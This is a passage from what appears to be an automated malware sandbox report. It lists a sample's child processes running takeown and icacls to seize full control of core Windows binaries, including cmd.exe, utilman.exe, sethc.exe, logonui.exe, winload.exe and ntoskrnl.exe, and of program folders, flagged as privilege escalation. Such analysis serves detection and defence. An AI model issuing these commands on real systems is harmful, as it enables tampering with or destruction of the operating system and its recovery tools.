  PID:4732
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\34c553de294c1d56d0a800105b" /a
  2⤵
  PID:4760
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\34c553de294c1d56d0a800105b" /grant Administrators:F
  2⤵
  PID:4876
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\cmd.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2512
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Documents and Settings" /a
  2⤵
  PID:6136
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\cmd.exe" /grant Administrators:F
  2⤵
  PID:2248
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Documents and Settings" /grant Administrators:F
  2⤵
  PID:4396
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\PerfLogs" /a
  2⤵
  PID:5944
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\PerfLogs" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:5704
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3752
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files" /grant Administrators:F
  2⤵
  PID:5044
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\regedit.exe" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:2408
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\regedit.exe" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:6036
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\reg.exe" /a
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:3692
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\reg.exe" /grant Administrators:F
  2⤵
  PID:4664
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\7-Zip" /a
  2⤵
  - Modifies file permissions
  PID:5464
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\taskmgr.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5868
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\7-Zip" /grant Administrators:F
  2⤵
  PID:1012
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\taskmgr.exe" /grant Administrators:F
  2⤵
  PID:2996
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\7-Zip\7z.exe" /a
  2⤵
  PID:3952
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\7-Zip\7z.exe" /grant Administrators:F
  2⤵
  PID:428
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\7-Zip\Lang" /a
  2⤵
  PID:1600
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\7-Zip\Lang" /grant Administrators:F
  2⤵
  PID:1560
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2640
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1808
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\DESIGNER" /a
  2⤵
  PID:1868
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\msconfig.exe" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:4280
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\DESIGNER" /grant Administrators:F
  2⤵
  PID:3088
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\msconfig.exe" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1952
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:6092
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared" /grant Administrators:F
  2⤵
  PID:5716
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ClickToRun" /a
  2⤵
  PID:5288
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ClickToRun" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2264
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe" /a
  2⤵
  - Modifies file permissions
  PID:2956
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe" /grant Administrators:F
  2⤵
  PID:5800
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5616
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:5192
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\utilman.exe" /a
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:2200
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\InputPersonalization.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4400
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\utilman.exe" /grant Administrators:F
  2⤵
  PID:4420
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\InputPersonalization.exe" /grant Administrators:F
  2⤵
  PID:5740
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\ar-SA" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2992
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\ar-SA" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:5864
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\bg-BG" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4612
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\bg-BG" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:4796
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\cs-CZ" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1240
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\cs-CZ" /grant Administrators:F
  2⤵
  PID:4772
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\da-DK" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4720
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\da-DK" /grant Administrators:F
  2⤵
  PID:4760
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\sethc.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5300
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\de-DE" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5328
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\sethc.exe" /grant Administrators:F
  2⤵
  PID:3740
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\de-DE" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:964
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\el-GR" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4636
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\el-GR" /grant Administrators:F
  2⤵
  PID:3480
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\en-GB" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3712
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\en-GB" /grant Administrators:F
  2⤵
  PID:828
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\en-US" /a
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:32
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\en-US" /grant Administrators:F
  2⤵
  PID:2248
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\es-ES" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3436
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\es-ES" /grant Administrators:F
  2⤵
  PID:4448
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\perfmon.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3064
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\es-MX" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3176
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\perfmon.exe" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:3216
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\es-MX" /grant Administrators:F
  2⤵
  PID:1012
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\et-EE" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:3220
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\et-EE" /grant Administrators:F
  2⤵
  PID:5184
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fi-FI" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:6060
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fi-FI" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:3952
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fr-CA" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5388
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fr-CA" /grant Administrators:F
  2⤵
  PID:444
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fr-FR" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4984
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\perfmon.msc" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2900
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fr-FR" /grant Administrators:F
  2⤵
  PID:536
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\perfmon.msc" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2856
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3060
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions" /grant Administrators:F
  2⤵
  PID:4312
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3592
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad" /grant Administrators:F
  2⤵
  PID:1820
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\insert" /a
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1216
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\insert" /grant Administrators:F
  2⤵
  PID:5092
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad" /a
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:1276
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad" /grant Administrators:F
  2⤵
  PID:3288
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\resmon.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:884
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:4008
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\resmon.exe" /grant Administrators:F
  2⤵
  PID:3564
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:8
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskclearui" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5640
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskclearui" /grant Administrators:F
  2⤵
  PID:4648
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4496
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu" /grant Administrators:F
  2⤵
  PID:4548
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknav" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:4628
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknav" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2412
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:4732
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\logonui.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4692
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad" /grant Administrators:F
  2⤵
  PID:920
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\logonui.exe" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4704
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskpred" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5096
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskpred" /grant Administrators:F
  2⤵
  PID:3740
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3792
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2012
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\he-IL" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5556
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\he-IL" /grant Administrators:F
  2⤵
  PID:3860
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\hr-HR" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4276
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\taskkill.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5240
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\hr-HR" /grant Administrators:F
  2⤵
  PID:400
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\taskkill.exe" /grant Administrators:F
  2⤵
  PID:3516
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\hu-HU" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1704
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\hu-HU" /grant Administrators:F
  2⤵
  PID:5588
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\HWRCustomization" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:4048
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\HWRCustomization" /grant Administrators:F
  2⤵
  PID:3064
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\it-IT" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:868
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\it-IT" /grant Administrators:F
  2⤵
  PID:4844
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\ja-JP" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2164
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\ja-JP" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1280
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\ko-KR" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:5204
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\rundll32.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:796
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\rundll32.exe" /grant Administrators:F
  2⤵
  PID:2016
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\ko-KR" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1424
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\LanguageModel" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4984
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\LanguageModel" /grant Administrators:F
  2⤵
  PID:2508
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\lt-LT" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5760
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\lt-LT" /grant Administrators:F
  2⤵
  PID:6080
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\lv-LV" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2580
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\lv-LV" /grant Administrators:F
  2⤵
  PID:2824
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\nb-NO" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5532
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\rstrui.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3244
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\nb-NO" /grant Administrators:F
  2⤵
  PID:2908
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\rstrui.exe" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:5616
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\nl-NL" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2376
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\nl-NL" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:732
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\pl-PL" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2272
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\pl-PL" /grant Administrators:F
  2⤵
  PID:2008
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\pt-BR" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3856
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\pt-BR" /grant Administrators:F
  2⤵
  PID:4592
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\pt-PT" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4804
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\pt-PT" /grant Administrators:F
  2⤵
  PID:4800
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\sfc.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4536
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\ro-RO" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2224
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\sfc.exe" /grant Administrators:F
  2⤵
  PID:4768
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\ro-RO" /grant Administrators:F
  2⤵
  PID:5548
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\ru-RU" /a
  2⤵
  PID:5164
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\ru-RU" /grant Administrators:F
  2⤵
  PID:5324
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\sk-SK" /a
  2⤵
  PID:3676
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\sk-SK" /grant Administrators:F
  2⤵
  PID:1656
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\sl-SI" /a
  2⤵
  PID:5492
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\sl-SI" /grant Administrators:F
  2⤵
  PID:4636
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\sr-Latn-RS" /a
  2⤵
  PID:2408
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\winload.exe" /a
  2⤵
  PID:3404
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\sr-Latn-RS" /grant Administrators:F
  2⤵
  PID:1084
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\winload.exe" /grant Administrators:F
  2⤵
  PID:1048
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\sv-SE" /a
  2⤵
  PID:4896
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\sv-SE" /grant Administrators:F
  2⤵
  PID:2972
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\th-TH" /a
  2⤵
  PID:2724
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\th-TH" /grant Administrators:F
  2⤵
  PID:3436
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\tr-TR" /a
  2⤵
  - Possible privilege escalation attempt
  PID:3204
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\tr-TR" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:5220
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\uk-UA" /a
  2⤵
  PID:5172
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\uk-UA" /grant Administrators:F
  2⤵
  PID:428
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\ntoskrnl.exe" /a
  2⤵
  PID:4192
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\zh-CN" /a
  2⤵
  PID:3520
- C:\windows\system32\icacls.exe
